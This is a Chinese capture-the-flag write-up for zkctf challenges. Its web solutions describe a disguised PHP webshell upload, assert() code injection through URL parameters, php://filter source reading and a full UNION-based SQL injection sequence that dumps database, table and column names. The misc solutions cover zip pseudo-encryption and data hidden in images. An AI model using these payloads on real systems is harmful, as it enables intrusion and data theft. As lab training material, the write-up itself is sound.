zkctf部分题目的wp

Web upload

打开题目地址发现是空白
1
查看源代码看到upload.php
2
所以把file改成upload.php,发现是个文件上传,且只能上传jpg格式的文件
3
写php一句话木马
4
上传时用bp抓包
5
对比上传正常的jpg文件时的请求,把一句话的文件类型改成image/jpeg
6
go一下发现上传成功
7
接着用菜刀连接
8
得到flag
9

Web warmup

打开题目地址页面上只有一个haha…查看源代码发现一个index.php
10
在url中添上index.php得到一段代码
11
查阅assert函数:检查一个断言是否为 FALSE,如果 传入的值是字符串,它将会被 assert() 当做 PHP 代码来执行。
所以可以令a=highlight_file(‘flag.php’);// 高亮显示flag.php,并注释掉后面的代码(==$b都被注释掉了)
阅读代码,当b!=Hello World!时程序结束并输出haha…所以先传入b的值:

1
?b=Hello%20word!&a=highlight_file(%27flag.php%27);//

得到flag
12

Web where is flag

因为有中英文按钮,发现可以文件上传
13
用php://filter读取index.php,再用base64解码即可得到flag
14

Web sql-1

判断回显位
-1’ union select 1,2,3,4 #

爆数据库
-1’ union select database(),2,3,4 #
【或:-1’ union select group_concat(schema_name),2,3,4 from information_schema.schemata #】

爆sql1数据库的数据表
-1’ union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=’sql1’#

爆 fl4g 表的列
‘ union select group_concat(column_name),2,3,4 from information_schema.columns where table_name=’fl4g’ #

爆出flag
‘ union select *,2,3,4 from fl4g #

Misc dog

下载的压缩包中含有一个flag.jpg和一个打开需要密码的flag.txt,把图片用记事本格式打开查找secret得到打开txt文件需要的密码,打开文件得到flag

Misc real pass

打开压缩包发现需要密码,尝试暴力破解但是提示该文件被损坏或是未加密文件
16
于是猜想可能是伪加密,用WinHex打开
17
发现源文件数据区加密区为09 00,改成00 00再打开就不需要密码,于是拿到flag。

Misc hotdog

用WinHex打开发现图片中还隐藏了一个flag.zip,将该图片用360压缩打开,得到
15
打开flag.zip需要密码,密码由颜文字解密得到,解密网站https://tool.zcmzcm.org/aadecode
输入密码打开flag.txt文件即拿到flag。

Misc zkzkzk

拼图得flag

Misc 格式里的秘密

图片用记事本打开搜索得到flag